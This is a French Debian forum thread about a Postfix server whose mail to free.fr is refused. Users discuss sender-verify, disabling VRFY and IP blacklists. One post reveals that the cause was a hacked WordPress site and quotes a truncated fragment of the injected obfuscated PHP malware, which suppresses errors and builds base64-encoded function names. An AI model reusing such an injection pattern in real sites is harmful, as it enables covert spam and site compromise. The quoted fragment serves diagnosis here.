Envoi d'email impossible avec postfix vers free.fr

Support Debian
#1

Bonjour,

Depuis que j’ai mis en place un nouveau serveur mail sur debian 7.8, les emails vers free.fr sont refusés :

Je n’ai que quelques email par jours vers free.fr, donc ce n’est pas le volume qui pose problème mais quelque chose d’autre. Sur la page postmaster.free.fr/ free demande a désactivé le « Sender Verify » qui pourrais être responsable de ce blocage mais comment vérifié si il est réellement active sur mon serveur et comment le faire pour le désactivé ?

postconf | grep “verify”

address_verify_cache_cleanup_interval = 12h address_verify_default_transport = $default_transport address_verify_local_transport = $local_transport address_verify_map = btree:$data_directory/verify_cache address_verify_negative_cache = yes address_verify_negative_expire_time = 3d address_verify_negative_refresh_time = 3h address_verify_poll_count = ${stress?1}${stress:3} address_verify_poll_delay = 3s address_verify_positive_expire_time = 31d address_verify_positive_refresh_time = 7d address_verify_relay_transport = $relay_transport address_verify_relayhost = $relayhost address_verify_sender = $double_bounce_sender address_verify_sender_dependent_default_transport_maps = $sender_dependent_default_transport_maps address_verify_sender_dependent_relayhost_maps = $sender_dependent_relayhost_maps address_verify_sender_ttl = 0s address_verify_service_name = verify address_verify_transport_maps = $transport_maps address_verify_virtual_transport = $virtual_transport lmtp_tls_scert_verifydepth = 9 lmtp_tls_verify_cert_match = hostname proxy_write_maps = $smtp_sasl_auth_cache_name $lmtp_sasl_auth_cache_name $address_verify_map $postscreen_cache_map smtp_tls_scert_verifydepth = 9 smtp_tls_verify_cert_match = hostname smtpd_tls_ccert_verifydepth = 9 tlsproxy_tls_ccert_verifydepth = $smtpd_tls_ccert_verifydepth

#2

Dans /etc/postfix/main.cf,

ajoute ceci :

...
disable_vrfy_command = yes

Puis restart postfix.

Ce paramètre, si sa valeur est no, permet à une machine d’utiliser la commande smtp vrfy.
La commande vrfy, pour rappel, permet de savoir si le sender, càd l’adresse email de l’expéditeur existe bien chez le serveur expédieur.

#3

Merci,

Je l’ai mis en place, je vais voir le résultat dans 24h chez free.fr

#4

C’est étrange chez moi il n’est pas désactivé et je n’ai pas de problème.

#5

Après plus de 48h, toujours blocage chez free, mais là il semble que ce soit à cause d’email inexistant :

En tous cas sur la page postmaster.free.fr/ c’est clairement indiqué qu’il faut désactiver « Sender-Verify »

#6

=> là tu es confronté à un autre problème. Il s’agit ici d’envoi massif de mails vers des adresses emails destinataires qui n’existent pas, et là free te coupe toute suite la connexion smtp.
T’es en train de faire de emailing avec une base mail bourrée de déchets.

#7

=> là tu es confronté à un autre problème. Il s’agit ici d’envoi massif de mails vers des adresses emails destinataires qui n’existent pas, et là free te coupe toute suite la connexion smtp.
T’es en train de faire de emailing avec une base mail bourrée de déchets.[/quote]
Il s’agit d’envoi de 3 à 5 emails légitime par jour (confirmation d’inscription à un site) vers free.fr, et il arrive qu’un passe une fois de temps à autre …
Et c’est la que ca ce complique justement,car ce n’est ni un envoi de masse si un envoi de spam.

#8

Je vérifierais déjà que mon @ IP n’est pas en liste noire.

#9

Si c’est ton ip de ton fai grand public (orange, free, sft, …) c’est sûre tu es blacklisté …
et aucun moyen de de te white lister …
pour vérifier :
spamhaus.org/query/bl?ip=ton_ip_a_toi

#10

J’ai une réponse de postmaster@proxad.net, il m’on fournit des statistiques des sessions SMTP, et la ça ne colle absolument pas a mes log:
par exemple :
Mar 6 : 612 SMTP sessions, 552 RCPT TO, 63 do not exist (11.41%)
Or mon serveur a logué que 2 emails recommencés 4 fois chacun avent de passer en bounce.

Serait-il possible que mon postfix me cache des envois qu’il fait en douce ?
Moi je regarde uniquement /var/log/mail.log

#11

Merci pour votre aide, j’ai fini par trouver le coupable,

Un de nos clients qu’on héberge avait un WP piraté :

//###=### error_reporting(0); ini_set("display_errors", "0"); if (!isset($if8e7ff5a)) { $if8e7ff5a = TRUE; $GLOBALS['_662750469_']=Array(base64_decode('cHJl' .'Z' .'19t' .'Y' .'XR' .'jaA=='),base64_decode('Z' .'mlsZ' .'V9n' .'ZXRfY29udGV' .'ud' .'HM='),base64_decode('Zmls' .'ZV' .'9nZX' .'R' .'f' .'Y29udG' .'V' .'ud' .'HM='),base64_decode('dXJsZW5jb2Rl'),base64_decode('dXJs' .'ZW5' .'jb' .'2Rl'),base64_decode ...
Et du coup notre serveur faisait bien du spam, mais sans utilisé le serveur mail local …

#12

Salut,

As tu suivi ([strike]malgré tout[/strike]) le tuto de Sir Tonio ?

#13

[quote=“BelZéButh”]Salut,

As tu suivi ([strike]malgré tout[/strike]) le tuto de Sir Tonio ?[/quote]
Bonjour,
Non, a tu le lien vers le tuto de Sir Tonio ?

#14

[quote=“tof”]Si c’est ton ip de ton fai grand public (orange, free, sft, …) c’est sûre tu es blacklisté …
et aucun moyen de de te white lister …
pour vérifier :
spamhaus.org/query/bl?ip=ton_ip_a_toi[/quote]
Absolument faux :whistle:
Je m’autohéberge et au pire mon IP était en liste «grise», j’ai montré patte blanche pour divers presta de ce genre et maintenant je n’ai que Bouygues qui me refuse les mail car n’accepte qu’une liste blanche d’IP/serveur. Pour les autres je n’ai aucun problèmes.

#15

[quote=“Mimoza”][quote=“tof”]Si c’est ton ip de ton fai grand public (orange, free, sft, …) c’est sûr tu es blacklisté …
[/quote]
Absolument faux :whistle:
Je m’autohéberge et au pire mon IP était en liste «grise», j’ai montré patte blanche pour divers presta de ce genre et maintenant je n’ai que Bouygues qui me refuse les mail car n’accepte qu’une liste blanche d’IP/serveur. Pour les autres je n’ai aucun problèmes.[/quote]

Je confirme, je suis aussi auto-hébergé pour mon mail perso et je n’ai jamais eu de soucis avec l’envoi de mails. Je suis chez illyse.

Par contre, là où j’ai eu un souci, c’est sur un serveur en DC et tout :slightly_smiling: Un utilisateur avait un doute sur la syntaxe d’une boîte chez free, du coup il a essayé de fausses boîtes. Au troisième essai : tadam, liste noire !

(host mx1.free.fr[212.27.48.6] said: 451 too many errors detected from your IP (95.130.10.216), please visit http://postmaster.free.fr/ (in reply to DATA command)
#16

La détection est en générale sur une période de temps donné, si tu fait 3 erreur étalé sur x jours je ne pense pas que tu sois banni. Idem le bannissement peut être fait sur une période bien définit.

Je viens d’aller voir le site mis en lien et en effet le bannissement est sur une durée de 24h max.

#17

[quote=“Mimoza”]La détection est en générale sur une période de temps donné, si tu fait 3 erreur étalé sur x jours je ne pense pas que tu sois banni. Idem le bannissement peut être fait sur une période bien définit.

Je viens d’aller voir le site mis en lien et en effet le bannissement est sur une durée de 24h max.[/quote]

Les trois essais ont été faits consécutivement, donc sur une période d’un quart d’heure à tout cassé. Par contre, ça fait 36h que cette IP est bannie.

#18

[quote=“Bobak”][quote=“BelZéButh”]Salut,

As tu suivi ([strike]malgré tout[/strike]) le tuto de Sir Tonio ?[/quote]
Bonjour,
Non, a tu le lien vers le tuto de Sir Tonio ?[/quote]

[mono]“J’étais d’une assiduité, d’une attention, d’un zèle, qui charmaient tout le monde.”[/mono]

Recherche d’un prestataire pour installation serveur mail

[quote=“BelZéButh”]Salut,

[quote=“Bobak”]Bonjour,
Je suis à la recherche d’un prestataire pour l’installation d’un serveur mail (Postfix) personnalisé sur un serveur dédié OVH sous Debian 7.8.
Si vous êtes intéressé ou si vous connaissez une boite qui le fait, pouvez me transmettre un message en privé SVP.
[/quote]
Oui.
Sans pub, starbridge.org/spip/spip.php?article12
Tonio, est un geek dans ce domaine. :wink:[/quote] :033

#19

C’est pas normal

Tu es sur qu’il n’y a pas eu d’autres tentatives après ?

#20

Il y avait postfix qui essayait de vider sa queue de temps en temps, je ne sais pas si ça a une influence. Ce serveur envoie une demie-dizaine de mails par jour vers free en moyenne et il n’y a pas de raison pour que ça soit du spam.
L’IP a été dé-bannie ce matin en tout cas.